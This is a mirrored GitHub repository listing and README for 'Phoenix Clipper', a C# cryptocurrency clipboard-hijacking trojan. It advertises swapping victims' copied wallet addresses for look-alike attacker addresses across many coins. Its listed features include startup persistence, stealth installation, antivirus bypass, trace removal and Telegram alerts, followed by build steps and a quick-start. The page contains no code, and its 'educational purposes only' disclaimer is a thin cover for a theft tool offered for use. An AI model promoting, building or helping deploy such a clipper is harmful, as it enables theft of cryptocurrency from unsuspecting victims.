https://github.com/clipperxss/clipper-malware-trojan
๐ฆ Multi substitution of cryptocurrency wallets in the clipboard!
https://github.com/clipperxss/clipper-malware-trojan
Last synced: 10 months ago
JSON representation
๐ฆ Multi substitution of cryptocurrency wallets in the clipboard!
- Host: GitHub
- URL: https://github.com/clipperxss/clipper-malware-trojan
- Owner: CLIPPERXSS
- License: mit
- Created: 2025-08-24T11:35:51.000Z (11 months ago)
- Default Branch: main
- Last Pushed: 2025-08-24T11:49:17.000Z (11 months ago)
- Last Synced: 2025-08-24T17:25:26.943Z (11 months ago)
- Language: C#
- Size: 771 KB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Phoenix Clipper
Advanced Crypto Wallet Clipper + Auto-Run + Hidden Installer + AntiVirus Bypass
## ๐ Overview
Fenix Clipper is a sophisticated cryptocurrency wallet replacement tool written in C# that seamlessly substitutes wallet addresses with visually similar counterparts from your predefined list.
> **โ ๏ธ Disclaimer**: This software is intended for educational and research purposes only. The developer is not responsible for any misuse of this tool.
## ๐ Features
- ๐ **Smart Wallet Matching** - Finds the most visually similar wallet based on first/last characters
- ๐ **Auto-Run** - Automatic system persistence and startup
- ๐ต๏ธ **Stealth Installation** - Hidden installation process
- ๐ก๏ธ **AV Bypass** - Advanced techniques to bypass antivirus detection
- ๐งน **Self-Cleanup** - Removes traces from initial execution location
- ๐ฑ **Telegram Notifications** - Real-time alerts via Telegram bot 
## ๐ฏ Supported Wallets
- **Bitcoin** - 1*** 3*** bc1***
- **Ethereum & All Tokens** - 0x*** (USDT, ETC, etc)
- **Monero** - 4*** 8***
- **Stellar** - G***
- **Ripple** - r***
- **Neocoin** - A***
- **Bitcoin Cash** - bitcoincash:*** q*** p***
- **Dogecoin** - D***
- **Litecoin** - M*** L***
- **Dash** - X***
- **Tron** - T***
- **ZCash** - t1***
- **Binance Chain** - bnb***
## ๐ ๏ธ Builder
## ๐ฆ Installation & Build
### Prerequisites
- **Visual Studio 2022** (v17.*)
- **.NET SDK 4.0.*** (included with VS2022)
- **.NET Framework 4.7** (included with VS2022)
### NuGet Packages
Required packages:
- `DNLib 3.5.0`
- `IconExtractor 1.0.1`
- `Vestris.ResourceLib 2.1.0`
### Runtime Requirements
For pre-built releases:
- **Builder.exe**: .NET Runtime 4.7.*
- **Stub**: .NET Framework 4.0
## ๐ Quick Start
1. Download the latest release
2. Configure your wallet list in the builder
3. Set up Telegram notifications (optional)
4. Build your customized executable
5. Test in controlled environment
---
For educational and research purposes only